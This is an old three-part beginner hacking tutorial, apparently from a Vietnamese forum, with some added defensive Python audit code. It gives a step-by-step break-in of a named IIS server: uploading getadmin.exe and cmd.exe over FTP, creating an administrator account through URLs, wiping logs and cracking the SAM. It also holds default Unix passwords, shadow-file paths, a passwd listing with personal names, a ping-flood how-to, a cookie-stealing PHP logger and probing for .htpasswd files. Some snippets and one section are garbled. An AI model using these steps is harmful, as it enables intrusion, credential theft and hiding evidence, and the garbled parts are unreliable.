become hacker

Upload: nguyenfly

Post on 30-May-2018


  • 8/14/2019 Become Hacker


    The Most Basic Knowledge for Becoming a Hacker - Part 1

    Many newbies have asked me: what is hacking, and how do you hack? But you have forgotten one thing: you need general background knowledge and an understanding of the terms that people who know networks commonly use. I am not that skilled myself, but through my research I have put together some basic knowledge that I want to share with all of you so that we can learn together. I will not take responsibility if you use it to harass other people. You may copy this or post it on other websites, but please put the author's name below the article; respecting this article means respecting me and my effort, and also respecting yourselves. I have also included some basic hack and ***** methods and examples that you can try out and study to understand more, and when you come across a term you do not understand, read this article to find out. I have used some ideas from articles I found very good on the HVA website and on other websites I have visited. Thank you to the authors who wrote those articles. Now for the main topic.

    ====================================================

    1 . ) What do we need to get started?

    Many of you may not agree with me, but the best way to practice is to use the Windows 9X operating system first and then move on to more powerful ones such as Linux or Unix. Here is what you need:
    + An OS (it can be DOS, Windows 9X, Linux, Unix ...)
    + A good website (HVA, for example, hi hi)
    + A good web browser (Netscape or IE, but the best is probably Gozzila)
    + A good chat tool (mIRC, Yahoo Mass ..)
    + Telnet (or similar tools such as nmap)
    + Most important of all, anyone who wants to become a hacker must have some knowledge of programming (C, C++, Visual Basic, Perl ..)

    2 . ) What is an IP address?

    _ An IP address is made up of 4 numbers, each in the range 0 - 255. Each number is stored in 1 byte, so an IP address is 4 bytes in size, and addresses are divided into classes. There are 3 classes: A, B and C. In class A we can have 16 million addresses, and in class B 65536 addresses. For example, in class B with 132.25 we have all the addresses from 132.25.0.0 to 132.25.255.255. Most class A addresses are owned by companies or organizations. An ISP usually owns a few class B or C addresses. For example, if your IP address is 132.25.23.24 then you can determine who your ISP is (the one with IP 132.25.x.).

    _ IP stands for Internet Protocol. On the Internet each person's IP address is unique and represents that person; IP addresses are used by different computers to identify the computers connected to them. This is why you can be banned from IRC, and it is how people find your IP. An IP address is easy to discover; people can obtain it in the following ways:
    + you browse a web page and your IP is logged
    + on IRC, anyone can get your IP
    + on ICQ, people can find out your IP; even if you select "do not show ip" they can still get it
    + if you connect to someone, they can type "systat n" and see who is connected to them
    + if someone sends you an email with a piece of Java code that captures the IP, they can also get your IP

    (Material from HVA)

    3 . ) How do you find out your own IP address?

    _ In Windows: go to Start, Run and type the command winipcfg.
    _ In mIRC: connect to a server and then type the command /dns
    _ Through one of the websites that display your IP.

    4 . ) What is IP spoofing?

    _ An IP address is meant to identify a single device in the world. Because of this, a server on the network may allow another device to exchange data with it without any further check. However, your IP can be changed, meaning that you can send forged information to another machine and that machine will believe the information came from some other machine (not yours, of course). You can get past the server without needing control of it. The obstacle is that the replies from the server are sent to the device whose IP we forged, so you may not receive the responses you were hoping for. Perhaps the only cases where IP spoofing is effective are when you need to get past a firewall, steal an account, or hide personal information!

    (Material from HVA)

    5 . ) What are a Trojan / worm / virus / logicbomb?

    _ Trojan: Put simply, this is a spy program installed on someone else's machine to steal data from that machine and send it back to its owner. What it steals can be passwords, accounts or cookies, depending on what the person who installed it wants.

    _ Virus: Put simply, this is a program with special code that is installed (or spreads from another machine) onto the victim's machine and carries out what that code demands. Most viruses are used to destroy data or damage the computer.

    _ Worm: This is a standalone program that can replicate itself and spread throughout a network. Like a virus, it can destroy data, or it can cause damage inside the network, sometimes even bringing the whole network down.

    _ Logicbomb: A program that sends many data packets at once to the same address, flooding the system and congesting the line (on the server), or that is used as a tool to terrorize the other party (mail bomb).

    6 . ) What is PGP?

    _ PGP stands for Pretty Good Privacy. It is a tool that uses public-key encryption to protect email records and data; it is a highly secure form of encryption implemented in software for MS-DOS, Unix, VAX/VMS and other platforms.

    7 . ) What is a proxy?

    _ A proxy gives users Internet access through a single host. Proxy servers serve particular protocols, or a set of protocols, and run on a dual-homed host or a bastion host. The user's client programs go through the proxy server instead of the real server the user needs to talk to. The proxy server examines requests from the client and decides whether or not to serve them; if a request is accepted, the proxy server connects to the real server on behalf of the client, forwards the client's requests to the server, and relays the server's responses back to the client. The proxy server is therefore an intermediary bridge between server and client.

    _ A proxy lets users access services on the Internet as if directly. With a dual-homed host, users must log in to the host before using any Internet service. This is usually inconvenient, and some people become frustrated when they feel they are going through a firewall; a proxy solves this problem. It does require new protocols, but in general it is quite convenient for users. Because the proxy lets users access Internet services from their own systems, it does not allow packets to pass directly between the user's system and the Internet. The path is indirect, through a dual-homed host or through a combination of a bastion host and a screening router.

    (Article by Z3RON3, material from HVA)

    8 . ) What is Unix?

    _ Unix is an operating system (like Windows). It is currently the most powerful operating system and the one closest to hackers. Once you have become a real hacker, this OS is indispensable. It is used to support programming in the C language.

    9 . ) What is Telnet?

    _ Telnet is a program that lets us connect to another machine through a port. Every computer or server has ports; here are some common ones:
    + Port 21: FTP
    + Port 23: Telnet
    + Port 25: SMTP (Mail)
    + Port 37: Time
    + Port 43: Whois

    _ Example: you can use Telnet to connect to mail.virgin.net on port 25.

    10 . ) How do you know you have telnetted to a Unix system?

    _ OK, I will tell you how a Unix system may greet you when you connect to it. First, when you call a Unix system, it usually shows a prompt: "Log in:" (however, that alone is not enough to be sure it is Unix, unless a banner appears before the words "log in:", for example: Welcome to SHUnix. Please log in .)
    Now we are at the login prompt and you need to enter a valid account. An account normally consists of 8 characters or more. After you enter the account, you will see a password prompt; try entering the default password according to the following table:

    Account         Default Password
    ------------------------------------
    Root            Root
    Sys             Sys / System / Bin
    Bin             Sys / Bin
    Mountfsy        Mountfsys
    Nuuc            Anon
    Anon            Anon
    User            User
    Games           Games
    Install         Install
    Demo            Demo
    Guest           Guest

    11 . ) What is a shell account?

    _ A shell account lets you use your home computer as a terminal from which you can issue commands to a computer running Unix. The shell is the program that interprets the characters you send and has them executed as Unix commands. With the right shell account you can use a workstation far more powerful than anything you could imagine.
    You can get a free shell account at the website www.freeshell.com, but you will not be able to use telnet until you pay for it.

    12 . ) How can you crack Unix account passwords?

    _ It is very simple, although the method I describe here is out of date; you may be able to crack them if you are lucky, and otherwise read this for reference.

    _ First log in to a system that runs Unix as a customer or a guest. If you are lucky you will get the passwords, which on standard systems are kept in:

    /etc/passwd

    Each line in a passwd file is a different account, and looks like this:

    userid:password:userid#:groupid#:GECOS field:home dir:shell

    where:
    + userid = the user id name: the login name; it can be a name or a number.
    + password: the password. You surely know what that is for.
    + userid#: a unique number assigned to the user when they first register.
    + groupid#: similar to userid#, but used for people who belong to some group (such as HVA's Hunter Buq group).
    + GECOS FIELD: this holds information about the user, including full name, phone number, address and so on. It is also a good source for easily ***** a password.
    + home dir: the directory that records the visitor's activity when they visit (like the History section in IE).
    + Shell: the name of the shell that starts automatically when we log in.

    _ Take the password file, bring the encrypted text file back, and then use the program "CrackerJack" or "John the Ripper" to ***** it.

    _ Looks fairly easy, doesn't it? Wrong. It is not easy, and you need luck to ***** it, because almost everyone now stores it very carefully; read on and you will see where the difficulty lies.

    13 . ) What is a shadowed password?

    _ A shadowed password is one where, in the Unix passwd file, other people see only a placeholder in the password field (such as the symbol X or *). This tells you that the password data is stored somewhere else, in a place an ordinary user cannot reach. Do we just give up? For a hacker, of course not: if we cannot reach the shadowed password file directly, we look for its backup copy, the unshadowed file.

    The location of these files is not fixed across Unix systems; try each of the following paths in turn:

    CODE
    AIX 3                   /etc/security/passwd              !
           or               /tcb/auth/files/ /
    A/UX 3.0s               /tcb/files/auth/?/                *
    BSD4.3-Reno             /etc/master.passwd                *
    ConvexOS 10             /etc/shadpw                       *
    ConvexOS 11             /etc/shadow                       *
    DG/UX                   /etc/tcb/aa/user/                 *
    EP/IX                   /etc/shadow                       x
    HP-UX                   /.secure/etc/passwd               *
    IRIX 5                  /etc/shadow                       x
    Linux 1.1               /etc/shadow                       *
    OSF/1                   /etc/passwd[.dir|.pag]            *
    SCO Unix #.2.x          /tcb/auth/files/ /
    SunOS4.1+c2             /etc/security/passwd.adjunct      =##username
    SunOS 5.0               /etc/shadow
                            maps/tables/whatever >
    System V Release 4.0    /etc/shadow                       x
    System V Release 4.2    /etc/security/* database
    Ultrix 4                /etc/auth[.dir|.pag]              *
    UNICOS                  /etc/udb

    The text before the first / on each line is the name of the corresponding system; go by the actual system you want to take the file from and follow the path that starts at the first /.
    Finally, here are some passwd accounts that I once *****; they may no longer be valid:

    CODE
    arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
    arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
    aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
    armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
    arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
    arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
    aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
    arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
    arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

    To keep them confidential I removed their passwords and put the symbol x in their place; see what information you can learn from these entries.
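
    The seven-field passwd record from section 12 and the shadow placeholders from section 13 can be checked by a system owner against their own file. The following is an added example, not code from the original article; the sample records and all function names are constructed for illustration.

```python
from collections import namedtuple

# Field order as given in the text:
# userid:password:userid#:groupid#:GECOS field:home dir:shell
Entry = namedtuple("Entry", "userid password uid gid gecos home shell")

# Tokens from the shadow table in the text that mean "hash is kept elsewhere".
SHADOW_TOKENS = {"x", "*", "!"}


def parse_passwd(text):
    """Return (entries, errors). Malformed lines are reported, never guessed at."""
    entries, errors = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            errors.append((lineno, "expected 7 fields, got %d" % len(parts)))
            continue
        try:
            uid, gid = int(parts[2]), int(parts[3])
        except ValueError:
            errors.append((lineno, "non-numeric uid or gid"))
            continue
        entries.append(Entry(parts[0], parts[1], uid, gid, *parts[4:]))
    return entries, errors


def classify_password_field(value):
    """Classify the second field of a passwd record."""
    if value == "":
        return "empty"          # account can log in without a password
    if value in SHADOW_TOKENS or value.startswith("##"):
        return "shadowed"       # real hash lives in a restricted file
    if value[0] in "!*":
        return "locked"
    return "inline-hash"        # hash sits in the world-readable file


def audit(text):
    """Return (subject, finding) pairs for one passwd-format text."""
    entries, errors = parse_passwd(text)
    findings = []
    for e in entries:
        kind = classify_password_field(e.password)
        if kind == "inline-hash":
            findings.append((e.userid, "password hash readable by every local user"))
        elif kind == "empty":
            findings.append((e.userid, "empty password field"))
        if e.uid == 0 and e.userid != "root":
            findings.append((e.userid, "uid 0 account other than root"))
    findings.extend(("line %d" % n, msg) for n, msg in errors)
    return findings


# Constructed sample records (not taken from any real system).
SAMPLE = """\
root:x:0:0:root:/root:/bin/sh
alice:x:1001:1000:Alice Example:/home/alice:/bin/ksh
legacy:ab1Cd2Ef3Gh4I:1002:1000:Legacy App:/home/legacy:/bin/sh
guest::1003:1000:Guest:/home/guest:/bin/sh
toor:*:0:0:Backup admin:/root:/bin/sh
broken:line:without:enough
"""

if __name__ == "__main__":
    for subject, finding in audit(SAMPLE):
        print("%-8s %s" % (subject, finding))
```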

    End of part 1

    Author: Anhdenday

    The Most Basic Knowledge for Becoming a Hacker - Part 2

    14 . ) What is a virtual port?

    _ A virtual port is a natural number carried in the TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) header. As everyone knows, Windows can run several programs at once, and each of these programs has its own port for sending and receiving data. For example, a machine with the IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server, etc. These services all run on the one IP address 127.0.0.1, so when a packet arrives, how does our computer tell whether the packet is meant for the web server, the FTP server or SMTP? That is why ports exist. Each service has a default port number: FTP defaults to port 21, the web service to port 80, POP3 to 110, SMTP to 25, and so on.
    The network administrator can change these default port numbers; if you do not know the port number on a server, you cannot connect to that service. You have probably heard of PORT MAPPING but may not know what it is or what it does. Port mapping is simply the process of changing the default port number of a service to another number. For example, the default port of a web server is 80, but occasionally you will see http://www.xxx.com:8080 ; here 8080 is the port number of host xxx, which the administrator of that host has "mapped" from 80 to 8080.

    (Material from HVA)

    15 . ) What is DNS?

    _ DNS stands for Domain Name System. A server running DNS waits for connections on port 53, which means that if you want to connect to that server, you must connect to port 53. A server running DNS translates hostnames made of letters into the corresponding numbers and vice versa. Example: 127.0.0.1 --> localhost and localhost --> 127.0.0.1 .

    (Material from HVA)

    16 . ) A few words about WinGate:

    _ WinGate is a simple program that lets you share connections. For example, you can share 1 modem between 2 or more machines. WinGate, used with various proxies, can hide you.

    _ How can WinGate hide you? Follow me: telnet to port 23 on a server running the WinGate telnet proxy and you will get the prompt WinGate > . At this prompt, type the server name, a space, and the port you want to connect to. Example:

    CODE
    telnet wingate.net
    WinGate > victim.com 23

    We telnet to port 23 because that is the default port when WinGate is installed. The IP that the victim's machine now records for us is the IP of the server hosting the WinGate proxy.

    _ How do you find WinGates?
    + If you want to find static WinGate IPs (IPs that do not change), go to yahoo or a search site and search for cable modems. Search for cable modems because many cable modem users run WinGate so that they can share the cable modem's broadband line with other machines in the same house. Or you can use port or domain scanners and scan port 1080.
    + To find dynamic WinGate IPs (IPs that change each time the user connects to the Internet), you can use Domscan or other scanning programs. If you use Domscan, enter any IP range in the first box and the number 23 in the second box. Once you have results, try telnetting to each IP address found (as described above); if the prompt Wingate > appears, you have found a machine running WinGate.
    + In my experience you should just download wingatescanner and use that; there are plenty of copies on the net.

    17 . ) A few words about Traceroute:

    _ Traceroute is a program that lets you determine the path packets take from your machine to a destination system on the Internet.

    _ Look at the following example:

    CODE
    C:\windows > tracert 203.94.12.54

    Tracing route to 203.94.12.54 over a maximum of 30 hops

    1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
    2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
    3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
    4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
    5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
    6 196.23.0.25 (196.23.0.25) 1195 ms 1204 ms
    7 backbone.isp.ny (198.87.12.11) 1208 ms 1216 ms 1233 ms
    8 asianet.com (202.12.32.10) 1210 ms 1239 ms 1211 ms
    9 south.asinet.com (202.10.10.10) 1069 ms 1087 ms 1122 ms
    10 backbone.vsnl.net.in (203.98.46.01) 1064 ms 1109 ms 1061 ms
    11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms 1146 ms 1203 ms
    12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms 1159 ms 1073 ms
    13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

    I need to know the path from my machine to a host on the Internet whose IP address is 203.94.12.54, so I need to tracert to it! As you can see above, packets from my machine have to pass through 13 hops (links) on the network to reach 203.94.12.54. This is the path the packets take.

    _ Look at the next example:

    CODE
    host2 # traceroute xyz.com

    traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
    1 isp.net (202.xy.34.12) 20ms 10ms 10ms
    2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

    + The first line shows the hostname and IP address of the destination system. This line also tells us the TTL value

    _ Note:
    On Windows: tracert hostname
    On Unix: traceroute hostname

    (Material from viethacker.net)

    18 . ) Ping and how to use it:

    _ Ping is a very simple concept, yet very useful for network diagnosis. The history of the word "ping" is as follows: ping is the sound sent out when a submarine wants to know whether another object is nearby. If there is an object near the submarine, the sound wave hits it and the echo that comes back is the "pong", so the submarine knows something is close.

    _ On the Internet, the concept of ping is very similar to that history. The ping command sends an ICMP (Internet Control Message Protocol) packet to a host; if the host "pongs" back, the host exists (or is reachable). Ping can also tell us how long a data packet takes to travel from our computer to a given host.

    _ Pinging is easy: just open MS-DOS and type "ping ip_address". By default it pings 4 times, but you can also type

    CODE
    ping ip.address -t

    This makes the machine ping forever. To change the ping size, do the following:

    CODE
    ping -l (size) ip_address

    What ping does is send a packet to a computer and then see how long it takes for the packet to come back; this determines the speed of the connection, and the time needed for a packet to go out and come back, divided by four (called the "trip time"). Ping can also be used to slow down or crash a system with a ping flood. Windows 98 hangs after one minute of ping flood (the connection buffer overflows because there are too many connections, so Windows decides to give it a rest). A ping flood attack takes up a lot of your own bandwidth, and you must have more bandwidth than the other party (unless the other party is a machine running Windows 98 and you have an average modem, in which case you will knock the other party down after roughly one minute of ping flood). Ping flooding is not very effective against slightly stronger opponents, unless you have many lines and control a fair number of servers that ping together with a total bandwidth greater than the other party's.

    Note: the -t option in DOS does not cause a ping flood; it only pings the target continuously, with pauses between two consecutive pings. On all Unix or Linux systems you can use ping -f to cause a real flood. In fact ping -f must be there if you use a POSIX-compatible version (POSIX - Portable Operating System Interface based on uniX), otherwise it is not a real Unix/Linux, so if you use an operating system that calls itself Unix or Linux, it will have the -f parameter.

    (Material from HVA and viethacker.net)

    19 . ) Technique for breaking into Windows NT from the Internet:

    _ This is the first hacking lesson I practiced when I began studying hacking, and now I will pass it on to you. You will need some time to carry it out, because it is easy and yet hard. Let us begin:

    _ First you need to find a server running IIS.
    _ Next go to DOS and type "FTP". Example:

    c:\Ftp www.dodgyinc.com

    (this site still worked when I practiced on it; I do not know whether they have fixed it by now. If anyone has another site, please post it so everyone can try.)
    If the connection succeeds, you will see lines similar to these:

    CODE
    Connected to www.dodgyinc.com.
    220 Vdodgy Microsoft FTP Service (Version 3.0).
    User (www.dodgyinc.com:(none)):

    What we see above contains very important information: it tells us that the NetBIOS name of the computer is Vdodgy. From this you can infer the account name used on NT that we can exploit; the default that the FTP service assigns, if it has not been renamed, will be IUSR_VDODGY. Remember it, because it will be useful. Enter "anonymous" as the user and the following line appears:

    CODE
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:

    At this point the password is something we do not know, but try typing "anonymous" as the password. If that is wrong, log in to the FTP service again, and remember that this time you should not use the anonymous login but "Guest", and try the password "guest" to see what happens.
    Now type this command in DOS:

    CODE
    Cd /c

    You will see the result if you have got in successfully. Now quickly look for the `cgi-bin` directory. If you are lucky you will find it easily, because administrators usually place `cgi-bin` in the area we have just entered so that they can manage the network more easily. The cgi-bin directory can contain programs that you can take advantage of by running them from your web browser. Let us start making trouble.

    _ First, change to the cgi-bin directory and use the "Binary" command (you may not need this command), then type the command "put cmd.exe". Next you need the hack files to place in this directory; search the net for the 2 most important files, `getadmin.exe` and `gasys.dll`. Download them, and once you have them, put them in the cgi-bin directory. OK, that part is done; close the DOS window.
    Now type the following address into your browser:

    http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

    After a few seconds you will get a response like the one below:

    CODE
    CGI Error
    The specified CGI application misbehaved by not returning a complete set of HTTP headers.
    The headers it did return are:
    Congratulations , now account IUSR_VDODGY have administrator rights!

    You have now impersonated the admin to get into the system. What you need to do now is create an account for yourself; type the following line in IE:

    http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

    The command line above creates a login account for you with user: anhdenday and passwd: toilahacker
    Now give this user admin rights; you only need to type this command into IE:

    http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

    That is it. Disconnect, go to Start menu -> Find, and search for the computer `www.dodgyinc.com`. When it is found, choose Explore; NT Explorer will open and you enter the user and passwd to open it (mine are user: anhdenday and passwd: toilahacker).

    One issue is that when you break into this system it is logged, so to erase your traces go to `Winnt\system32\logfiles`, open the log file, delete the information related to you, and save it. If you want to get some notification about the sharing of the intrusion, change the date on the computer with the following URL:

    http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

    When that is done, delete the files `getadmin.exe` and `gasys.dll` from `cgi-bin`. Our purpose in breaking into this system is to "lift" the admin's password so that next time we can get in legitimately, so find the SAM file (which holds the passwords of the admin and members) on the system and use the program "l0pht *****" to ***** the passwords (I have already posted a guide on how to use "l0pht ***** v 3.02"; study it yourselves). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=
    When the ***** is finished you will have the admin's user and password; now delete the user account (mine was "anhdenday") to be safe. You can do whatever you like in the system, but please do not delete all their documents; that would be hard on them.
    How do you feel, quite complicated, isn't it? When I tried this hack I fumbled around for a full 4 hours; once you are used to it, the second time will take you less time.

    In part 3 I will cover the Linux operating system, how to break the password protection of a web site, how to hack a web page in the simplest way, and so on.

    End of part 2

    Anhdenday
    HVA

    The Most Basic Knowledge for Becoming a Hacker - Part 3

    20 . ) What is a cookie?

    _ Cookies are small pieces of structured data shared between a web site and the user's browser. Cookies are stored as small text data files (under 4k in size). Sites create them to store, retrieve and recognize information about users who have visited the site and the areas of the site they have passed through.

    This information can include the user's name or identifier, password, preferences, habits and so on. A cookie is accepted by the user's browser and saved on the hard disk of the user's machine; not every browser supports cookies. After one visit to a site, information about the user is stored in the cookie. On later visits to that site, the web site can reuse the information in the cookie (such as information related to logging in to a forum) so that the user does not have to log in again or re-enter other information. The problem is that many sites handle the reuse of information stored in cookies incorrectly, check it incompletely, or encrypt the information in the cookie poorly, which lets hackers exploit it to get past the login gate and take control of the site.

    _ Cookies usually have the following components:

    + Name: chosen by the web site's programmer.
    + Domain: the domain name of the server from which the cookie was created and sent.
    + Path: information about the path on the web site you are viewing.
    + Expiry date: the time at which the cookie ceases to be valid.
    + Security: if this value is set in the cookie, the information is encrypted in transit between server and browser.
    + Other values: specific data stored by the web server for later identification; these values contain no spaces, periods or commas and are limited to about 4k.

    (Material from Viethacker.net)
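
    An added example (not from the original article) that checks Set-Cookie headers for the weaknesses described above: credentials kept in the cookie, and a missing Secure attribute, which restricts the cookie to HTTPS connections. The HttpOnly and Domain checks, the name hints, the sample headers and all function names are assumptions made for illustration.

```python
# Added example: audit Set-Cookie header values. All sample data is constructed.
SENSITIVE_HINTS = ("pass", "pwd", "session", "auth", "token", "member")
MAX_COOKIE_BYTES = 4096  # the roughly 4k limit mentioned in the text


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, sep, value = parts[0].partition("=")
    name = name.strip()
    if not sep or not name:
        raise ValueError("not a name=value cookie: %r" % header_value)
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, value.strip(), attrs


def audit_cookie(header_value):
    """Return (cookie name, list of issues) for one Set-Cookie value."""
    name, value, attrs = parse_set_cookie(header_value)
    lname = name.lower()
    issues = []
    if "pass" in lname or "pwd" in lname:
        issues.append("credential stored client-side")
    if any(hint in lname for hint in SENSITIVE_HINTS):
        if "secure" not in attrs:
            issues.append("no Secure flag: also sent over plain HTTP")
        if "httponly" not in attrs:
            issues.append("no HttpOnly flag: readable by scripts in the page")
        if "domain" in attrs:
            issues.append("Domain set: also sent to subdomains of "
                          + attrs["domain"].lstrip("."))
    if len(name) + len(value) > MAX_COOKIE_BYTES:
        issues.append("larger than 4 KB: browsers may drop it")
    return name, issues


def audit_headers(header_values):
    """Map each cookie name to its list of issues."""
    return dict(audit_cookie(h) for h in header_values)


SAMPLE_HEADERS = [  # constructed, not captured from a real site
    "member_id=42; Path=/forum; Domain=.forum.example; "
    "Expires=Wed, 01 Jan 2031 00:00:00 GMT",
    "pass_hash=0123456789abcdef0123456789abcdef; Path=/",
    "session=opaque-random-id; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/",
]

if __name__ == "__main__":
    for cookie, problems in audit_headers(SAMPLE_HEADERS).items():
        print(cookie, "->", problems or "ok")
```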

    21 . ) Technique for stealing a victim's cookie:

    _ First, open notepad and copy the following code into it:

    CODE
    }
    // get current date
    $now = date("Y-m-d H:i:s");
    // init
    $myData = "[-----$now-----]" . LINE;
    // get
    $myData .= getvars($HTTP_GET_VARS, "");
    // file
    $file = $REMOTE_ADDR . ".txt";
    $mode = "r+";
    if (!file_exists($file))
    $mode = "w+";
    $fp = fopen ($file, $mode);
    fseek($fp, 0, SEEK_END);
    fwrite($fp, $myData);
    fclose($fp);
    ?>

    or

    CODE

    CODE`)\">

    or:

    [CODEimg]javascript: Document.write(``)\">

    _ You can find web sites on which to try the method in this example by going to google.com and searching for forums with this bug using the keyword "Powered by .. forum" with the following forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find forums that have not fixed this bug to practice on; whoever finds one, please share it with everyone.

    _ There are many other interesting cookie-stealing code snippets; look for more on your own.

    22 . ) Cch ngt mt khu bo v Website :

    _ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trangWeb khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y chnhl khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt nhm ngino ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi taclick vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cngtrong th mc bo v trang Web . Ti sao phi dng du chm trc trong tn file`.htaccess`? Cc file c tn bt u l mt du chm `.` s c cc web servers xem nh lcc file cu hnh. Cc file ny s b n i (hidden) khi bn xem qua th mc c bo v

    bng file .htaccess .Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton mbn mun xm nhp . Mt ci qun l mt khu v user name , mt ci qun l cng vicm ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m ra . Bnhy nhn VD sau :

    CODEGraham:F#.DG*m38d%RFWebmaster:GJA54j.3g9#$@f

    Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D nhin

    l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ? ci ny nc s can thip ca thng file .htaccess . Do khi cng trong cng th mc chng c tc ngqua li bo v ln nhau nn chng ta cng khng di g m c gng t nhp ri ***** mmt khu cht tit ( khi cha c ngh ***** mt khu trong tay . Ti cng ang nghincu c th xm nhp trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y ,chuyn g s xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta schm c n d dng , bn hy xem link VD sau :

    http://www.company.com/cgi-bin/pro tected/

    hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL sau :

    http://www.company.com/cgi-bin/pro tected/.htpasswd

  • 8/14/2019 Become Hacker

    14/41

    If you get a "File not found" reply or something similar, then this file is certainly not protected; find it with one of the following URLs :

    http://www.company.com/.htpasswd
    http://www.company.com/cgi-bin/.htpasswd
    http://www.company.com/cgi-bin/passwords/.htpasswd
    http://www.company.com/cgi-bin/passwd/.htpasswd

    If you still cannot find it, keep trying other similar URLs (it may be sitting right in the root directory) until you do. Once you have found this file, use the program "John the ripper" or "Crackerjack" to ***** the passwords stored in it. You surely know what to do next : take a valid user name and password, get in and see what the boys and girls are confiding to each other in there, but do not change their passwords or make trouble for them. You can also use this method to get the admin's password, because almost all the members of a closed group are people with rank and privileges.
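Seen from the site owner's side, the condition described above (a password file that the web server will hand out because it sits inside the served tree) can be found with a short audit. This is an added example, not code from the original article: the function names, the `server_root` default and the sample directory tree are assumptions constructed for illustration.

```python
import os
import shlex
import tempfile


def auth_user_files(htaccess_path, server_root="/etc/apache2"):
    """Return the absolute AuthUserFile targets declared in one .htaccess file."""
    targets = []
    with open(htaccess_path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            try:
                parts = shlex.split(line)          # copes with quoted paths
            except ValueError:
                continue                           # unbalanced quotes: skip the line
            if len(parts) >= 2 and parts[0].lower() == "authuserfile":
                path = parts[1]
                # Apache resolves a relative AuthUserFile against ServerRoot.
                if not os.path.isabs(path):
                    path = os.path.join(server_root, path)
                targets.append(os.path.realpath(path))
    return targets


def is_inside(path, root):
    """True when path is root itself or lies somewhere below it."""
    path, root = os.path.realpath(path), os.path.realpath(root)
    try:
        return os.path.commonpath([path, root]) == root
    except ValueError:                             # e.g. different drives
        return False


def audit_docroot(docroot, server_root="/etc/apache2"):
    """List credential files that a request to the web server could reach."""
    docroot = os.path.realpath(docroot)
    findings = set()
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower().startswith(".htpasswd"):
                findings.add(("password-file-in-docroot", full))
            elif name == ".htaccess":
                # Also catches password files that were given another name.
                for target in auth_user_files(full, server_root):
                    if is_inside(target, docroot):
                        findings.add(("AuthUserFile-points-into-docroot", target))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: one protected directory done badly, one done properly."""
    base = os.path.realpath(tempfile.mkdtemp(prefix="htaudit-"))
    docroot = os.path.join(base, "htdocs")
    private = os.path.join(base, "private")        # outside the served tree
    bad = os.path.join(docroot, "cgi-bin", "protected")
    good = os.path.join(docroot, "members")
    for directory in (private, bad, good):
        os.makedirs(directory)
    with open(os.path.join(bad, ".htpasswd"), "w") as fh:
        fh.write("sampleuser:CONSTRUCTED-HASH\n")
    with open(os.path.join(bad, ".htaccess"), "w") as fh:
        fh.write('AuthType Basic\nAuthName "Members"\nAuthUserFile "%s"\n'
                 'Require valid-user\n' % os.path.join(bad, ".htpasswd"))
    with open(os.path.join(private, "members.htpasswd"), "w") as fh:
        fh.write("sampleuser:CONSTRUCTED-HASH\n")
    with open(os.path.join(good, ".htaccess"), "w") as fh:
        fh.write("AuthType Basic\nAuthName Members\nAuthUserFile %s\n"
                 "Require valid-user\n" % os.path.join(private, "members.htpasswd"))
    return docroot


if __name__ == "__main__":
    for kind, path in audit_docroot(build_sample_tree()):
        print(kind, path)
```

Apache's stock configuration also refuses requests for names beginning with `.ht`; the audit is for trees where that rule has been removed or the password file has been renamed.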

    23 . ) Understanding CGI ?

